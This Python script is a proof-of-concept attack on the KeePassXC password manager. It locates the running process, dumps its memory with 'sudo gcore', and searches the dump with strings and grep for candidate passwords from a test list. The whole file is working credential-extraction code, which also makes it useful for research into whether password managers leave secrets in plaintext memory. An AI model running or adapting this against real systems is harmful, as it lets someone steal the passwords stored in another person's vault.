import subprocess
import psutil


def is_process_running(process_to_find, all_processes=None):
    try:
        if all_processes is None:
            all_processes = psutil.process_iter(['pid', 'name'])

        for process in all_processes:
            if process_to_find.lower() in process.info['name'].lower():
                return True
    except Exception as e:
        print(f"============ ERROR ============\n\n{e}\n\n============ AT 'is_process_running()' FUNCTION ============")
    return False


def get_pid(process_name, all_processes=None):
    if all_processes is None:
        all_processes = psutil.process_iter(['pid', 'name'])

    try:
        for process in all_processes:
            try:
                if process_name.lower() in process.info['name'].lower():
                    return process.info['pid']
            except (psutil.NoSuchProcess, psutil.AccessDenied, AttributeError) as e:
                # skip any errors that might occur
                print(f"============ WARNING ============\n\n{e}\n\n============ AT 'get_pid()' FUNCTION ============")
                continue
    except Exception as e:
        print(f"============ ERROR ============\n\n{e}\n\n============ AT 'get_pid()' FUNCTION ============")
    return None


def create_core_dump(process_name, pid):
    try:
        subprocess.run(["sudo", "gcore", "-o", f"{process_name}_dump", str(pid)], check=True)
        return True
    except subprocess.CalledProcessError as e:
        print(f"============ ERROR ============\n\n{e}\n\n============ AT 'create_core_dump()' FUNCTION ============")
        return False


def perform_poc(core_dump_file, keywords):
    found_pws = set()
    try:
        result = subprocess.run(["cat", core_dump_file], stdout=subprocess.PIPE, text=False)
        
        strings_output = subprocess.run(["strings"], input=result.stdout, stdout=subprocess.PIPE, text=False)

        for keyword in keywords:
            grep_output = subprocess.run(["grep", keyword], input=strings_output.stdout, stdout=subprocess.PIPE, text=False)

            if grep_output.stdout.strip(): # check if a match is found and has a length of 1 (matches with a length of more than 1 do not correspond to a password match)
                # print(f"> match: {grep_output.stdout.strip()}\n")
                # if len(grep_output.stdout.strip().split()) == 1:
                found_pws.add(keyword)
    except Exception as e:
        print(f"============ ERROR ============\n\n{e}\n\n============ AT 'perform_poc()' FUNCTION ============")
    return found_pws


def main():
    with open("TestPasswords.txt", 'r') as file:
        passwords = [pw.strip() for pw in file.readlines()]

    process_name = "keepassxc"
    # processes = psutil.process_iter(['pid', 'name'])

    if not is_process_running(process_name):
        print(f"> Process {process_name} is not running, aborting...")
        return
    
    try:
        pid = get_pid(process_name)
        if pid is None:
            print(f"> Couldn't get PID for {process_name}, aborting...")
            return
    except Exception as e:
        return

    
    
    print(f"> {process_name} is running.")
    print(f"> PID: {pid}")
    print(f"> Attempting to create core dump...")

    if not create_core_dump(process_name, pid):
        print(f"> Couldn't create core dump, aborting...")
        return

    core_dump_file = f'{process_name}_dump.{pid}'
    print(f"> Successfully created core dump in '{core_dump_file}'")

    print(f"> Attempting to find passwords...")

    passwords_in_db = perform_poc(core_dump_file, passwords)

    print(f"> Possible passwords found in database:")
    for pw in passwords_in_db:
        print(pw)



if __name__ == "__main__":
    main()